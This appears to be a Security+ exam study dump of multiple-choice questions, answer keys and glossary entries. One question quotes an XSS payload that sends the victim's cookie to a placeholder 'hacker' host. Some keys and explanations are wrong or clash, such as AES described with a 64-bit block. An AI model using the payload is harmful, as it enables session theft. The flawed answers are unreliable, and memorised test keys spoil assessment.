Security Plus Study Question v1


13. Which of the following best describes a network-based attack that can allow an attacker to take full control of a vulnerable host? a. Remote exploit b. Amplification c. Sniffing d. Man-in-the-middle attack

A

16. A security analyst is reviewing an assessment report that includes software versions, running services, supported encryption algorithms, and permissions settings. Which of the following produced the report? a. Vulnerability scanner b. Protocol scanner c. Network mapper d. Web inspector

A

18. Which of the following differentiates a collision attack from a rainbow table attack? a. A rainbow table attack performs a hash lookup b. A rainbow table attack uses the hash as a password c. In a collision attack, the hash and the input data are equivalent d. In a collision attack, the same input results in different hashes

A

28. A technician is configuring a load balancer for the application team to accelerate the network performance of their applications. The applications are hosted on multiple servers and must be redundant. Given this scenario, which of the following would be the best method of configuring the load balancer? a. Round robin b. Weighted c. Least connection d. Locality based

A

3. A company wants to ensure that confidential data from storage media is sanitized in such a way that the drive cannot be reused. Which of the following methods should the technician use? a. Shredding b. Wiping c. Low-level formatting d. Repartitioning e. Overwriting

A

35. Which of the following threat actors is most likely to steal a company's proprietary information to gain a market edge and reduce time to market? a. Competitor b. Hacktivist c. Insider d. Organized crime

A

37. Two users must encrypt and transmit large amounts of data between them. Which of the following should they use to encrypt and transmit the data? a. Symmetric encryption b. Hash function c. Digital Signature d. Obfuscation

A

41. Based on risk assessment, the ARO value of a malware infection for the server is 5. The annual cost for the malware protection is $2500. Which of the following SLE values warrants a recommendation against purchasing the protection? a. $500 b. $1000 c. $2000 d. $2500

A

42. A security engineer must install the same X.509 certificate on three separate servers. The client application that connects to the servers performs a check to ensure that the certificate matches the host name. Which of the following should the security engineer use? a. Wildcard certificate b. Extended validation certificate c. Certificate chaining d. Certificate utilizing the SAN field

A

44. A stock trading company had the budget for enhancing its secondary datacenter approved, since the main site is in a hurricane-affected area and the disaster recovery site is 100 miles (161 km) away. The company wants to ensure its business is always operational with the least amount of man hours needed. Which of the following types of disaster recovery sites should the company implement? a. Hot site b. Warm site c. Cold site d. Cloud based site

A

45. A forensic expert is given a hard drive from a crime scene and is asked to perform an investigation. Which of the following is the first step the forensic expert needs to take to protect the chain of custody? a. Make a forensic copy b. Create a hash of the drive c. Recover the hard drive data d. Update the evidence log

A

46. A remote intruder wants to take inventory of a network so exploits can be researched. The intruder is looking for information about software versions on the network. Which of the following techniques is the intruder using? a. Banner grabbing b. Port scanning c. Packet sniffing d. Virus scanning

A

49. Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the Operating System? a. Privilege escalation b. Pivoting c. Process affinity d. Buffer overflow

A

55. When it comes to cloud computing, if one of the requirements for a project is to have the most control over the systems in the cloud, which of the following is a service model that would be most suited? a. Infrastructure b. Platform c. Software d. Virtualization

A

56. Whilst on a business trip, a user's mobile device goes missing. The user immediately contacts the organization's service desk to report the incident. Which of the following is the best response to protect the data stored on the user's mobile device? a. Remote wipe the mobile device via the Mobile Device Manager to ensure that data is not compromised b. Deploy full device encryption through the Mobile Device Manager to ensure data is not accessed c. Track the mobile device through geolocation services, and then alert the authorities of its whereabouts d. Initiate remote lockout on the mobile device to prevent unauthorized access

A

60. Joe, a salesman, was assigned to a new project that requires him to travel to a client site. Whilst waiting for a flight, Joe decides to connect to the airport wireless network without connecting to a VPN, and then sends confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon investigation the company learns Joe's emails were intercepted. Which of the following most likely caused the data breach? a. Policy violation b. Social engineering c. Insider threat d. Zero-day attack

A

63. A computer emergency response team is called at midnight to investigate a case in which a mail server was restarted. After an initial investigation, it was discovered that email is being exfiltrated through an active connection. Which of the following is the next step the team should take? a. Identify the source of the active connection b. Perform eradication on the active connection and recover c. Perform a containment procedure by disconnecting the server d. Format the server and restore its initial configuration

A

68. A security technician is configuring an access management system to track and record user actions. Which of the following functions should the technician configure? a. Accounting b. Authorization c. Authentication d. Identification

A

69. Most organizations operating in the same vertical want to provide seamless wireless access for their employees as they visit the other organizations. Which of the following should be implemented if all organizations use the native 802.1x client on their mobile devices? a. Shibboleth b. RADIUS federation c. SAML d. OAuth e. OpenID Connect

A

7. Users from two organizations, each with its own PKI, need to begin working together on a new project. Which of the following would allow the users of the separate PKIs to work together without connection errors? a. Trust model b. Stapling c. Intermediate CA d. Key escrow

A

73. After a user reports slow computer performance, a systems administrator detects a suspicious file, which was installed as part of a freeware software package. The systems administrator reviews the output below: C:\windows\system32>netstat -nab Active connections Proto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0:0 LISTENING RpcSs (svchost.exe) TCP 0.0.0.0:445 0.0.0.0:0 LISTENING (svchost.exe) TCP 192.168.1.10:5000 10.37.213.20 ESTABLISHED winserver.exe UDP 192.168.1.10:1900 *:* Based on the above information, which of the following types of malware was installed on the user's computer? a. RAT b. Key logger c. Spyware d. Worm e. Bot

A

74. A user typically works remotely over the holidays, using a web based VPN to access corporate resources. The user reports getting untrusted host errors and being unable to connect. Which of the following is the likely cause? a. The certificate has expired b. The browser does not support SSL c. The user's account is locked out d. The VPN software has reached the seat license maximum

A

8. An application was recently compromised after some malformed data came in via a web form. Which of the following would most likely have prevented this? a. Input validation b. Proxy server c. Stress testing d. Encoding

A

802.1x

A port-based authentication protocol. Wireless can use 802.1X. For example, WPA2-Enterprise mode uses an 802.1X server (implemented as a RADIUS server) to add authentication.

75. Which of the following answers refers to an agreement established between the organizations that own and operate connected IT systems to document the technical requirements of the interconnection? A. ISA B. SLA C. MoU D. BPA

Answer: A. ISA Explanation: The term Interconnection Security Agreement (ISA) refers to an agreement established between the organizations that own and operate connected IT systems to document the technical requirements of the interconnection.

63. In which of the cloud computing infrastructure types do clients, instead of buying all the hardware and software, purchase computing resources as an outsourced service from suppliers who own and maintain all the necessary equipment? A. IaaS B. SaaS C. P2P D. PaaS

Answer: A. IaaS Explanation: Infrastructure as a Service (IaaS) is one of the cloud computing infrastructure types where clients, instead of buying all the hardware and software, purchase computing resources as an outsourced service from suppliers who own and maintain all the necessary equipment. The clients usually pay for computational resources on a per-use basis. In IaaS, the cost of the service depends on the amount of consumed resources.

87. In forensic procedures, a sequence of steps in which different types of evidence should be collected is known as: A. Order of volatility B. Layered security C. Chain of custody D. Transitive access

Answer: A. Order of volatility Explanation: In forensic procedures, a sequence of steps in which different types of evidence should be collected is known as order of volatility.

68. Which of the following is an example of multifactor authentication? A. Password and biometric scan B. User name and PIN C. Smart card and identification badge D. Iris and fingerprint scan

Answer: A. Password and biometric scan Explanation: Authentication is proving user identity to a system. The authentication process can be based on different categories of authentication factors, including unique physical traits of each individual such as fingerprints ("something you are"), physical tokens such as smart cards ("something you have"), or user names and passwords ("something you know"). Additional factors might include geolocation ("somewhere you are"), or user-specific activity patterns such as keyboard typing style ("something you do"). Multi-factor authentication systems require implementation of authentication factors from two or more different categories.

34. Which of the following tools would be used to check the contents of an IP packet? A. Protocol analyzer B. Secure Shell (SSH) C. SNMP agent D. Port scanner

Answer: A. Protocol analyzer Explanation: A protocol analyzer (also known as a packet sniffer) is a tool used for capturing and analyzing the contents of network packets.

81. A maximum acceptable period of time within which a system must be restored after failure is referred to as: A. Recovery Time Objective (RTO) B. Mean Time To Restore (MTTR) C. Maximum Tolerable Period of Disruption (MTPOD) D. Mean Time Between Failures (MTBF)

Answer: A. Recovery Time Objective (RTO) Explanation: A maximum acceptable period of time within which a system must be restored after failure is also known as Recovery Time Objective (RTO). RTOs are established at the Business Impact Analysis (BIA) stage of Business Continuity Planning (BCP). The goal of a Business Impact Analysis is to determine the impact of any disruption of the activities that support the organization's key products and services. A key aspect of determining the impact of a disruption is identifying the so-called Maximum Tolerable Period of Disruption (MTPOD), which is the maximum amount of time that an enterprise's key products or services can be unavailable or undeliverable after an event that causes disruption to operations. The goal of the Recovery Time Objective is to ensure that the Maximum Tolerable Period of Disruption (MTPOD) for each activity is not exceeded.

82. Which of the terms listed below is used to describe the loss of value to an asset based on a single security incident? A. SLE B. ARO C. ALE D. SLA

Answer: A. SLE Explanation: The term Single Loss Expectancy (SLE) is used to describe the loss of value to an asset based on a single security incident.

69. An authentication subsystem that enables a user to access multiple, connected system components (such as separate hosts on a network) after a single login at only one of the components is known as: A. SSO B. SSH C. SSL D. SLA

Answer: A. SSO Explanation: An authentication subsystem that enables a user to access multiple, connected system components (such as separate hosts on a network) after a single login at only one of the components is known as Single Sign-On (SSO). A single sign-on subsystem typically requires a user to log in once at the beginning of a session, and then during the session grants further access to multiple, separately protected hosts, applications, or other system resources without further login action by the user.

19. Which of the terms listed below is used to describe an unskilled individual exploiting computer security loopholes with the use of code and software written by someone else? A. Script kiddie B. Black hat hacker C. Hacktivist D. White hat hacker

Answer: A. Script kiddie Explanation: Unskilled individuals exploiting computer security loopholes with the use of code and software written by someone else are called script kiddies.

2. Which of the following answers refers to malicious software performing unwanted and harmful actions in disguise of a legitimate and useful program? A. Trojan horse B. Spyware C. Logic bomb D. Adware

Answer: A. Trojan horse Explanation: Software that performs unwanted and harmful actions in the disguise of a legitimate and useful program is referred to as a Trojan horse. This type of malware may act like a legitimate program and have all the expected functionality, but apart from that it will also contain a portion of malicious code appended to it that the user is unaware of.

51. A logical grouping of computers that may be physically located on different parts of a LAN is called Virtual Local Area Network (VLAN). A. True B. False

Answer: A. True Explanation: A logical grouping of computers that may be physically located on different parts of a LAN is called Virtual Local Area Network (VLAN). VLANs allow computer hosts to act as if they were attached to the same broadcast domain, regardless of their physical location. VLAN membership can be configured through software instead of physically relocating devices or connections, and VLANs are often created with the use of switches equipped with additional software features.

55. One of the measures used in OS hardening includes disabling unnecessary ports and services. A. True B. False

Answer: A. True Explanation: Disabling unnecessary ports and services is one of the measures for securing Operating System (OS) software.

89. Which of the following backup site types allows for the fastest disaster recovery? A. Cold site B. Hot site C. Warm site D. Cross-site

Answer: B. Hot site Explanation: A hot site is a type of backup site that allows for the fastest disaster recovery. A hot site constitutes a mirror copy of the original site, with all the facilities, equipment, and data readily available for use in case of emergency.

61. A software application used to manage multiple guest operating systems on a single host system is called: A. ICS server B. Hypervisor C. UC server D. Virtual switch

Answer: B. Hypervisor Explanation: A software application used to manage multiple guest operating systems on a single host system is called a hypervisor.

100. What is the name of a storage solution used to retain copies of private encryption keys? A. Trusted OS B. Key escrow C. Proxy D. Recovery agent

Answer: B. Key escrow Explanation: Key escrow is a storage solution used to retain copies of private encryption keys.

29. Disabling SSID broadcast: A. Is one of the measures used for securing networks B. Makes a WLAN harder to discover C. Blocks access to WAP D. Prevents wireless clients from accessing the network

Answer: B. Makes a WLAN harder to discover Explanation: Service Set Identifier (SSID) is another term for the name of a Wireless Local Area Network (WLAN). Wireless networks advertise their presence by regularly broadcasting the SSID in a special packet called a beacon frame. In wireless networks with disabled security features, knowing the network SSID is enough to get access to the network. The SSID can be hidden by disabling the SSID broadcast on the Wireless Access Point (WAP), but a hidden SSID only makes a WLAN harder to discover and is not a true security measure. Wireless networks with a hidden SSID can still be discovered with the use of packet sniffing software. Security measures that help in preventing unauthorized access to a wireless network include strong encryption schemes such as WPA and WPA2.

1. Harmful programs used to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems are commonly referred to as: A. Adware B. Malware C. Ransomware D. Spyware

Answer: B. Malware Explanation: The term malware (short for malicious software) describes a wide category of harmful computer programs used to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems.

65. Which of the security controls listed below is used to prevent tailgating? A. Hardware locks B. Mantraps C. Video surveillance D. EMI shielding

Answer: B. Mantraps Explanation: Mantraps are two-door entrance points connected to a guard station. A person entering a mantrap from the outside remains inside until he/she provides the authentication token required to unlock the inner door. Mantraps are used to prevent tailgating, which is the practice of gaining unauthorized access to restricted areas by following another person.

76. A document established between two or more parties to define their respective responsibilities in accomplishing a particular goal or mission is called: A. BPA B. MoU C. SLA D. ISA

Answer: B. MoU Explanation: A document established between two or more parties to define their respective responsibilities in accomplishing a particular goal or mission is known as Memorandum of Understanding (MoU).

99. Which of the following solutions would be the fastest in validating digital certificates? A. IPX B. OCSP C. CRL D. OSPF

Answer: B. OCSP Explanation: Online Certificate Status Protocol (OCSP) allows for querying a Certificate Authority (CA) for the validity of a digital certificate. Another solution for checking whether a certificate has been revoked is the Certificate Revocation List (CRL). CRLs are updated regularly and sent out to interested parties. Compared to a CRL, OCSP allows for querying the CA at any point in time and retrieving information without any delay.

93. Any type of information pertaining to an individual that can be used to uniquely identify that individual is known as: A. PIN B. PII C. ID D. Password

Answer: B. PII Explanation: Personally Identifiable Information (PII) includes any type of information pertaining to an individual that can be used to uniquely identify that individual. The identity of a person can be established by tracing their most basic attributes such as name, surname, phone number or traditional mailing address, but also through their social security or credit card numbers, IP or email addresses, or data collected via biometric devices. Security of PII has become a major concern for companies and organizations due to the accessibility of this type of data over the Internet, but also due to misuse of personal electronic devices such as USB drives or smartphones that are easily concealable and can carry large amounts of data.

5. Which type of Trojan enables unauthorized remote access to a compromised system? A. pcap B. RAT C. MaaS D. pfSense

Answer: B. RAT Explanation: Remote Access Trojan (RAT) is a type of Trojan horse malware that enables unauthorized remote access to a compromised system.

86. Disabling certain system functions or shutting down the system when risks are identified is an example of: A. Risk acceptance B. Risk avoidance C. Risk transference D. Risk deterrence

Answer: B. Risk avoidance Explanation: Disabling certain system functions or shutting down the system when risks are identified is an example of risk avoidance.

58. Which of the answers listed below refers to a control system providing the capability for real-time monitoring and gathering information related to industrial equipment? A. OVAL B. SCADA C. TACACS D. SCAP

Answer: B. SCADA Explanation: Supervisory Control And Data Acquisition (SCADA) is a control system providing the capability for real-time monitoring and gathering information related to industrial equipment.

50. A bank is experiencing a DoS attack against an application designed to handle 500 IP-based sessions. In addition, the perimeter router can only handle 1 Gbps of traffic. Which of the following should be implemented to prevent DoS attacks in the future? a. Deploy multiple web servers and implement a load balancer b. Increase the capacity of the perimeter router to 10 Gbps c. Install a firewall at the network border to prevent all attacks d. Use redundancy across all network devices and services

C

54. The Chief Security Officer of a university is concerned about potential transmissions of usernames and passwords in clear text when authenticating to a directory server. Which of the following would best mitigate the CISO's concerns? a. SFTP b. SNMPv3 c. LDAPS d. SMB

C

57. An auditor confirms that the risk associated with a Windows-specific vulnerability that was discovered by the company's security tool does not apply because the server is running a Linux OS. Which of the following does this best describe? a. Inherent risk b. Attack vector c. False positive d. Remediation

C

66. A network administrator needs to allocate a new network for the R&D group. The network must not be accessible from the internet, regardless of the network firewall or other external misconfiguration. Which of the following settings should the network administrator implement to accomplish this? a. Configure the OS default TTL to 1 b. Use NAT on the R&D network c. Implement a router ACL d. Enable protected ports on the switch

C

9. A recent internal audit is forcing a company to review each internal business unit's VMs because the clusters they are installed on are in danger of running out of computer resources. Which of the following vulnerabilities exists? a. Buffer overflow b. End of life systems c. System sprawl d. Weak configuration

C

38. A security analyst conducts a manual scan on a known hardened host that identifies many non-compliant configuration items. Which of the following best describes why this has occurred? (Select two) a. Privileged user credentials were used to scan the host b. Non-applicable plugins were selected in the scan policy c. The incorrect audit file was used d. The output of the report contains false positives e. The target host has been compromised

C,D

CA

Certificate Authority. An organization that manages, issues, and signs certificates and is part of a PKI. Certificates are an important part of asymmetric encryption. Certificates include public keys along with details on the owner of the certificate and on the CA that issued the certificate. Certificate owners share their public key by sharing a copy of their certificate.

CRL

Certificate Revocation List. A list of certificates that have been revoked. Certificates are commonly revoked if they are compromised. The certificate authority (CA) that issued the certificate publishes a CRL, and a CRL is public.

CHAP

Challenge Handshake Authentication Protocol. Authentication mechanism where a server challenges a client. MS-CHAPv2 is an improvement over CHAP and uses mutual authentication.

CCTV

Closed-circuit television. This is a detective control that provides video surveillance. Video surveillance provides reliable proof of a person's location and activity. It can be used by an organization to verify if any equipment or data is being removed.

CAC

Common Access Card. A specialized type of smart card used by the United States Department of Defense. It includes photo identification and provides confidentiality, integrity, authentication, and non-repudiation for the users. It is similar to a PIV.

CERT

Computer Emergency Response Team. A group of experts that respond to security incidents. Also known as CIRT, SIRT, or IRT.

CIRT

Computer Incident Response Team. A group of experts that respond to security incidents. Also known as CERT, SIRT, or IRT.

CIA

Confidentiality, integrity, and availability. These three form the security triad. Confidentiality helps prevent the unauthorized disclosure of data. Integrity provides assurances that data has not been modified, tampered with, or corrupted. Availability indicates that data and services are available when needed.

COOP

Continuity of Operations Plan. A COOP site provides an alternate location for operations after a critical outage. A hot site includes personnel, equipment, software, and communications capabilities of the primary site with all the data up to date. A hot site can take over for a failed primary site within an hour. A cold site will have power and connectivity needed for COOP activation, but little else. A warm site is a compromise between a hot site and a cold site.

CAN

Controller Area Network. A standard that allows microcontrollers and devices to communicate with each other without a host computer.

QUESTION 1 A security administrator wants to implement a logon script that will prevent MITM attacks on the local LAN. Which of the following commands should the security administrator implement within the script to accomplish this task? A. arp -s 192.168.1.1 00-3a-d1-fa-b1-06 B. dig - [email protected] mypc.comptia.com C. nmap -A -T4 192.168.1.1 D. tcpdump -lnv host 192.168.1.1 or ether 00:3a:d1:fa:b1:06

Correct Answer: A

QUESTION 103 Two users must encrypt and transmit a large amount of data between them. Which of the following should they use to encrypt and transmit the data? A. Symmetric algorithm B. Hash function C. Digital signature D. Obfuscation

Correct Answer: A

QUESTION 108 Which of the following is the proper order for logging a user into a system from the first step to the last step? A. Identification, authentication, authorization B. Identification, authorization, authentication C. Authentication, identification, authorization D. Authentication, identification, authorization E. Authorization, identification, authentication

Correct Answer: A

QUESTION 129 An organization wants to upgrade its enterprise-wide desktop computer solution. The organization currently has 500 PCs active on the network. The Chief Information Security Officer (CISO) suggests that the organization employ desktop imaging technology for such a large-scale upgrade. Which of the following is a security benefit of implementing an imaging solution? A. It allows for faster deployment B. It provides a consistent baseline C. It reduces the number of vulnerabilities D. It decreases the boot time

Correct Answer: B

52. In computer networks, a computer system or an application that acts as an intermediary between another computer and the Internet is commonly referred to as: A. Load balancer B. Web server C. VPN concentrator D. Proxy server

Answer: D. Proxy server Explanation: In computer networks, a computer system or an application that acts as an intermediary between another computer and the Internet is commonly referred to as a proxy server.

85. Contracting out a specialized technical component when the company's employees lack the necessary skills is an example of: A. Risk deterrence B. Risk avoidance C. Risk acceptance D. Risk transference

Answer: D. Risk transference Explanation: Contracting out a specialized technical component when the company's employees lack the necessary skills is an example of risk transference.

46. What is the name of a secure replacement for Telnet? A. ICMP B. FTP C. IPv6 D. SSH

Answer: D. SSH Explanation: Secure Shell (SSH) is a tunneling protocol for secure remote login and other secure network services designed as a replacement for Telnet and other insecure remote shells.

78. Which of the answers listed below refers to a concept of having more than one person required to complete a given task? A. Acceptable use policy B. Job rotation C. Multifactor authentication D. Separation of duties

Answer: D. Separation of duties Explanation: The concept of having more than one person required to complete a given task is known as separation of duties. By delegating tasks and the associated privileges for a specific process among multiple users, this type of internal control provides a countermeasure against fraud and errors.

56. The term trusted OS refers to an operating system: A. Admitted to a network through NAC B. Implementing patch management C. That has been authenticated on the network D. With enhanced security features

Answer: D. With enhanced security features Explanation: The term Trusted OS refers to an operating system with enhanced security features. The most common access control model used in Trusted OS is Mandatory Access Control (MAC). Examples of Trusted OS implementations include Security Enhanced Linux (SELinux) and FreeBSD with the TrustedBSD extensions.

40. The Windows command-line utility for displaying intermediary points on the packet route is called: A. ping B. netstat C. ipconfig D. tracert

Answer: D. tracert Explanation: The Windows command-line utility for displaying the intermediary points (routers) a packet is passed through on its way to a destination host is called tracert. The command-line program for testing the reachability of a remote host is called ping. The Windows command-line program for displaying TCP/IP configuration details is called ipconfig. The command-line utility used for displaying active TCP/IP connections is called netstat.

48. Which version(s) of the SNMP protocol offer(s) only authentication based on community strings sent in unencrypted form? (Select all that apply) A. SNMPv1 B. SNMPv2 C. SNMPv3 D. SNMPv4

Answers: A and B. SNMPv1 and SNMPv2 Explanation: Of the three existing versions of the Simple Network Management Protocol (SNMP), versions 1 and 2 (SNMPv1 and SNMPv2) offer authentication based on community strings sent in unencrypted form (in cleartext). SNMPv3 provides packet encryption, authentication, and hashing mechanisms that allow for checking whether data has changed in transit.

94. What are the features of Elliptic Curve Cryptography (ECC)? (Select 2 answers) A. Asymmetric encryption B. Shared key C. Suitable for small wireless devices D. High processing power requirements E. Symmetric encryption

Answers: A and C. Asymmetric encryption and Suitable for small wireless devices Explanation: Elliptic Curve Cryptography (ECC) is a type of asymmetric encryption. ECC provides strong encryption while requiring less processing power than other encryption methods, which makes it suitable for small wireless devices such as handhelds and cell phones.

95. Advanced Encryption Standard (AES): (Select all that apply) A. Is a symmetric encryption algorithm B. Uses 128-, 192-, and 256-bit keys C. Is an asymmetric encryption algorithm D. Uses block cipher algorithm E. Requires multiple passes to encrypt data

Answers: A, B, and D. Is a symmetric encryption algorithm, Uses 128-, 192-, and 256-bit keys, and Uses block cipher algorithm Explanation: Advanced Encryption Standard (AES) is a strong symmetric encryption algorithm. AES uses a block cipher algorithm with the block size of 64 bits (compared to stream ciphers, which process data by encrypting individual bits, a block cipher divides data into separate fragments and encrypts each fragment separately). AES uses 128-, 192-, and 256-bit encryption keys.

22. Penetration testing: (Select all that apply) A. Bypasses security controls B. Only identifies lack of security controls C. Actively tests security controls D. Exploits vulnerabilities E. Passively tests security controls

Answers: A, C, and D. Bypasses security controls, Actively tests security controls, and Exploits vulnerabilities Explanation: Penetration testing bypasses security controls and actively tests security controls by exploiting vulnerabilities. Passive testing of security controls and identification of vulnerabilities, missing security controls, or common misconfigurations are the characteristic features of vulnerability scanning.

20. Which of the following facilitate(s) privilege escalation attacks? (Select all that apply) A. System/application vulnerability B. Distributed Denial of Service (DDoS) C. Social engineering techniques D. Attribute-Based Access Control (ABAC) E. System/application misconfiguration

Answers: A, C, and E. System/application vulnerability, Social engineering techniques, and System/application misconfiguration Explanation: Unpatched system/application vulnerabilities, social engineering, and system/application configuration errors are all factors facilitating privilege escalation attacks.

67. Solutions providing the AAA functionality include: (Select all that apply) A. MSCHAP B. RADIUS C. PPTP D. TACACS+

Answers: B and D. RADIUS and TACACS+ Explanation: Authentication, Authorization, and Accounting (AAA) is a security architecture framework designed for verification of the identity of a person or process (authentication), granting or denying access to network resources (authorization), and tracking the services users are accessing as well as the amount of network resources they are consuming (accounting). Remote Authentication Dial-In User Service (RADIUS) and Terminal Access Controller Access Control System Plus (TACACS+) are examples of protocols providing the AAA functionality.

QUESTION 13 A third-party penetration testing company was able to successfully use an ARP cache poison technique to gain root access on a server. The tester successfully moved to another server that was not in the original network. Which of the following is the MOST likely method used to gain access to the other host? A. Backdoor B. Pivoting C. Persistence D. Logic bomb

Correct Answer: B

QUESTION 16 A security analyst is acquiring data from a potential network incident. Which of the following evidence is the analyst MOST likely to obtain to determine the incident? A. Volatile memory capture B. Traffic and logs C. Screenshots D. System image capture

Correct Answer: B

QUESTION 1 Multiple organizations operating in the same vertical want to provide seamless wireless access for their employees as they visit the other organizations. Which of the following should be implemented if all the organizations use the native 802.1x client on their mobile devices? A. Shibboleth B. RADIUS federation C. SAML D. OAuth E. OpenID Connect

Correct Answer: B

QUESTION 23 After an identified security breach, an analyst is tasked to initiate the IR process. Which of the following is the NEXT step the analyst should take? A. Recovery B. Identification C. Preparation D. Documentation E. Escalation

Correct Answer: B

QUESTION 26 As part of a new BYOD rollout, a security analyst has been asked to find a way to securely store company data on personal devices. Which of the following would BEST help to accomplish this? A. Require the use of an eight-character PIN. B. Implement containerization of company data. C. Require annual AUP sign-off. D. Use geo-fencing tools to unlock devices while on the premises.

Correct Answer: B

QUESTION 28 Which of the following refers to the term used to restore a system to its operational state? A. MTBF B. MTTR C. RTO D. RPO

Correct Answer: B

QUESTION 2 Upon entering an incorrect password, the logon screen displays a message informing the user that the password does not match the username provided and is not the required length of 12 characters. Which of the following secure coding techniques should a security analyst address with the application developers to follow security best practices? A. Input validation B. Error handling C. Obfuscation D. Data exposure

Correct Answer: B

QUESTION 36 A security analyst is inspecting the results of a recent internal vulnerability scan that was performed against intranet services. The scan reports include the following critical-rated vulnerability: Title: Remote Command Execution vulnerability in web server; Rating: Critical (CVSS 10.0); Threat actor: any remote user of the web server; Confidence: certain; Recommendation: apply vendor patches. Which of the following actions should the security analyst perform FIRST? A. Escalate the issue to senior management. B. Apply organizational context to the risk rating. C. Organize for urgent out-of-cycle patching. D. Exploit the server to check whether it is a false positive.

Correct Answer: B

QUESTION 38 A security administrator receives an alert from a third-party vendor that indicates a certificate that was installed in the browser has been hijacked at the root of a small public CA. The security administrator knows there are at least four different browsers in use on more than a thousand computers in the domain worldwide. Which of the following solutions would be BEST for the security administrator to implement to most efficiently assist with this issue? A. SSL B. CRL C. PKI D. ACL

Correct Answer: B

QUESTION 42 Legal authorities notify a company that its network has been compromised for the second time in two years. The investigation shows the attackers were able to use the same vulnerability on different systems in both attacks. Which of the following would have allowed the security team to use historical information to protect against the second attack? A. Key risk indicators B. Lessons learned C. Recovery point objectives D. Tabletop exercise

Correct Answer: B

QUESTION 45 A forensic investigator has run into difficulty recovering usable files from a SAN drive. Which of the following SAN features might have caused the problem? A. Storage multipaths B. Deduplication C. iSCSI initiator encryption D. Data snapshots

Correct Answer: B

QUESTION 47 A software development manager is taking over an existing software development project. The team currently suffers from poor communication due to a long delay between requirements documentation and feature delivery. This gap is resulting in an above average number of security-related bugs making it into production. Which of the following development methodologies is the team MOST likely using now? A. Agile B. Waterfall C. Scrum D. Spiral

Correct Answer: B

QUESTION 50 A security analyst is mitigating a pass-the-hash vulnerability on a Windows infrastructure. Given the requirement, which of the following should the security analyst do to MINIMIZE the risk? A. Enable CHAP B. Disable NTLM C. Enable Kerberos D. Disable PAP

Correct Answer: B

QUESTION 51 An organization requires users to provide their fingerprints to access an application. To improve security, the application developers intend to implement multifactor authentication. Which of the following should be implemented? A. Use a camera for facial recognition B. Have users sign their name naturally C. Require a palm geometry scan D. Implement iris recognition

Correct Answer: B

QUESTION 30 A dumpster diver recovers several hard drives from a company and is able to obtain confidential data from one of the hard drives. The company then discovers its information is posted online. Which of the following methods would have MOST likely prevented the data from being exposed? A. Removing the hard drive from its enclosure B. Using software to repeatedly rewrite over the disk space C. Using Blowfish encryption on the hard drives D. Using magnetic fields to erase the data

Correct Answer: D

QUESTION 33 Which of the following would provide additional security by adding another factor to a smart card? A. Token B. Proximity badge C. Physical key D. PIN

Correct Answer: D

QUESTION 5 A penetration tester harvests potential usernames from a social networking site. The penetration tester then uses social engineering to attempt to obtain associated passwords to gain unauthorized access to shares on a network server. Which of the following methods is the penetration tester MOST likely using? A. Escalation of privilege B. SQL injection C. Active reconnaissance D. Proxy server

Correct Answer: C

QUESTION 50 A security architect has convened a meeting to discuss an organization's key management policy. The organization has a reliable internal key management system, and some argue that it would be best to manage the cryptographic keys internally as opposed to using a solution from a third party. The company should use: A. the current internal key management system. B. a third-party key management system that will reduce operating costs. C. risk benefits analysis results to make a determination. D. a software solution including secure key escrow capabilities.

Correct Answer: C

QUESTION 56 A recent internal audit is forcing a company to review each internal business unit's VMs because the cluster they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities exist? A. Buffer overflow B. End-of-life systems C. System sprawl D. Weak configuration

Correct Answer: C

QUESTION 60 Which of the following controls allows a security guard to perform a post-incident review? A. Detective B. Preventive C. Corrective D. Deterrent

Correct Answer: C

QUESTION 61 Attackers have been using revoked certificates for MITM attacks to steal credentials from employees of Company.com. Which of the following options should Company.com implement to mitigate these attacks? A. Captive portal B. Extended validation certificate C. OCSP stapling D. Object identifiers E. Key escrow

Correct Answer: C

QUESTION 64 Which of the following describes the key difference between vishing and phishing attacks? A. Phishing is used by attackers to steal a person's identity. B. Vishing attacks require some knowledge of the target of attack. C. Vishing attacks are accomplished using telephony services. D. Phishing is a category of social engineering attack.

Correct Answer: C

QUESTION 68 A company has a data classification system with definitions for "Private" and "Public". The company's security policy outlines how data should be protected based on type. The company recently added the data type "Proprietary". Which of the following is the MOST likely reason the company added this data type? A. Reduced cost B. More searchable data C. Better data classification D. Expanded authority of the privacy officer

Correct Answer: C

QUESTION 69 An attacker exploited a vulnerability on a mail server using the code below. <HTML><body onload=document.location.replace ('http://hacker/post.asp?victim&message =" + document.cookie + "<br>" +"URL:" +"document.location) ; /></body></HTML> Which of the following BEST explains what the attacker is doing? A. The attacker is replacing a cookie. B. The attacker is stealing a document. C. The attacker is replacing a document. D. The attacker is deleting a cookie.

Correct Answer: C

QUESTION 6 Which of the following BEST describes an important security advantage yielded by implementing vendor diversity? A. Sustainability B. Homogeneity C. Resiliency D. Configurability

Correct Answer: C

QUESTION 70 A security administrator installed a new network scanner that identifies new host systems on the network. Which of the following did the security administrator install? A. Vulnerability scanner B. Network-based IDS C. Rogue system detection D. Configuration compliance scanner

Correct Answer: C

QUESTION 72 A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the domain controller, the systems administrator needs to provide the domain administrator credentials. Which of the following account types is the systems administrator using? A. Guest account B. Service account C. User account D. Local account

Correct Answer: C

QUESTION 75 An audit report has identified a weakness that could allow unauthorized personnel access to the facility at its main entrance and from there gain access to the network. Which of the following would BEST resolve the vulnerability? A. Faraday cage B. Air gap C. Mantrap D. Bollards

Correct Answer: C

QUESTION 77 Systems administrators and key support staff come together to simulate a hypothetical interruption of service. The team updates the disaster recovery processes and documentation after meeting. Which of the following describes the team's efforts? A. Business impact analysis B. Continuity of operation C. Tabletop exercise D. Order of restoration

Correct Answer: C

QUESTION 7 Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the OS? A. Pivoting B. Process affinity C. Buffer overflow D. XSS

Correct Answer: C

QUESTION 85 A new security administrator ran a vulnerability scanner for the first time and caused a system outage. Which of the following types of scans MOST likely caused the outage? A. Non-intrusive credentialed scan B. Non-intrusive non-credentialed scan C. Intrusive credentialed scan D. Intrusive non-credentialed scan

Correct Answer: C

